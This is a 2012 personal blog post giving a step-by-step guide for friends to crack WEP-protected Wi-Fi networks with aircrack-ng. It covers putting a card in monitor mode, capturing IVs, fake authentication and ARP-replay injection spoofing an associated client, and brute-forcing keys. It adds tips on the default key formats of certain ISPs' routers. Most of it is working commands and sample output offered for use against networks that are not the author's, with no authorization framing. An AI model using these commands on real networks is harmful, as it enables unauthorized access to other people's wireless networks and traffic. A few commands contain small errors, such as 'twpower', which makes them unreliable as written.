My Method for cracking WEP

Friday, October 19, 2012 Posted by Unknown

There are 100's if not 1000's of guides out there on how to crack WEP. This will mostly be a quick and dirty reference guide for a few friends trying to crack WEP them self's.

Aircrack-ng's guide to cracking WEP

Download and boot off of backtrack 5 r3 To install it on a flash drive use linux/windows tool YUMI

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0 
#airodump-ng --encrypt wep mon0

You should see several AP. Record the BSSID, ESSID, and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0 

Start airmon-zc on the channel of the target. (with WEP its not as necessary to lock the channel in on the driver as you have to with WPA)

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wep --ivs --write <FILENAME> --output-format pcap -a --channel <Channel number>


Now you need to inject packets. This will send packets to the access point as the other associated client generating your golden IVS you need to crack the WEP. 

#aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 

If the above isn't generating any IVs you might need to tweak your command line. 

#aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 



Success looks like: (Stole this output from http://www.aircrack-ng.org)
18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.
Here is an example of what a failed authentication looks like:
8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request


You can also do a ARP request replay attack. Either at the same time or in lieu of the above attack. 

#aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>


Here is what the screen looks like when ARP requests are being injected:
 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


Now to crack the IV's you have obtain. There are a lot of different options at this point. For example. AT&T U-verse default wep is only numbers. Verizon FIOS wep is 0-9A-F. Doing home work on the default SSID might lead to a quicker crack.


Static WEP cracking options:
-c     Search alpha-numeric characters only.

-t      Search binary coded decimal characters only.

-n <nbits>
Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.

-f <fudge>
By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.

-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.


#aircrack-ng <any static WEP cracking options above> <filename>.cap

It will ask you to select your network you want to crack and show how many IV's it currently has. 

I only use the -f 1 option to get keys that are to easy and are thought to be false positives i.e. 123456789 or 111111111 

and remember a few quick google searches on the SSID (if its a default SSID) can save you a lot of time. 

Side note: if you run:

#iwconfig wlan0

And your power isn't set correctly to your gear you can change this by.

#iwconfig wlan0 twpower <dbi>


This is not a complete guide of everything you can do. Its just what I do and have a high success rate. if you have any questions feel free to drop me a e-mail/Gtalk at init6@init6.me 

Labels: , ,

Post a Comment